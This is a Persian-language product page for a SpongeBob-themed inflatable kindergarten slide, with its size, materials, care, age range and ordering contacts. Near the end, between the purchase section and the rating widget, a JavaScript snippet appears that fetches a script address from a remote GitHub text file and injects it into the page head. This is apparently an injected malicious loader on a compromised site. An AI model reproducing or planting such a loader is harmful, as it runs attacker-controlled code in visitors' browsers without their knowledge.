سرسره بادی باب اسفنجی

  • سرسره بادی باب اسفنجی یکی از جذاب سرسره بادی مهدکودکی بادی سازان مجد به شمار می ورد. دیوار های این سرسره منحنی شکل می باشد این دو دیواره با یک ارک به هم متصل شدند. این ارک از طراحی زیبای باب اسفنجی برخوردار است. دیوار های دستگاه از طرح های زیبای اختاپوس و اقای خرچنگ طراحی شده . که برای کودکان جذاب است . بر روی دیواره ایستگاه سرسره یک پارچه بع حالت سایبان طراحی شده که برای امنیت بیشتر و محافظت از کودکان می باشد.

    سرسره بادی باب اسفنجی

    ابعادقصر بادی مهد کودکی باب اسفنجی

    وزن این سرسره ۵۰ کیلوگرم، طول این سرسره ۴ متر و عرض آن ۳ متر می باشد. همچنین ارتفاع این سرسره ۲.۵ و ارتفاع سکوی آن ۱.۵ متر است. بنابرین شما می توانید از این سرسره در محیط های سربسته کوچک مانند مهدکودک ها و شهر بازی های سر پوشیده استفاده نمایید. لوازم جانبی این قصر بادی نیازمند یک پمپ هوا (دمنده باد) نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است. نحوه نگهداری و درجه سنی این سرسره باب اسفنجی مناسب سنین ۴ تا ۸ سال می باشد که در مهد کودک ها کاربرد بسیار بالایی دارد. همچنین این قصر بادی به شرایط بد آب و هوایی حساس است بنابرین دوری از رطوبت و گرمای آفتاب می تواند به طول عمر سرسره شما اضافه کند. جنس دوخت و پارچه پارچه این سرسره از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است. طرح و رنگ این سرسره بادی باب اسفنجی ثابت بوده و رنگ پارچه آن بر اساس موجودی انبار استفاده می شود. همچنین این سرسره دارای دو سرسره مشابه دیگر با همین ابعاد و طرح متفاوت می باشد. مشاهده سرسره بادی تام و جری و سرسره بادی مک کوئین.

    نحوه خرید این قصر بادی باب اسفنجی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید سرسره باب اسفنجی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید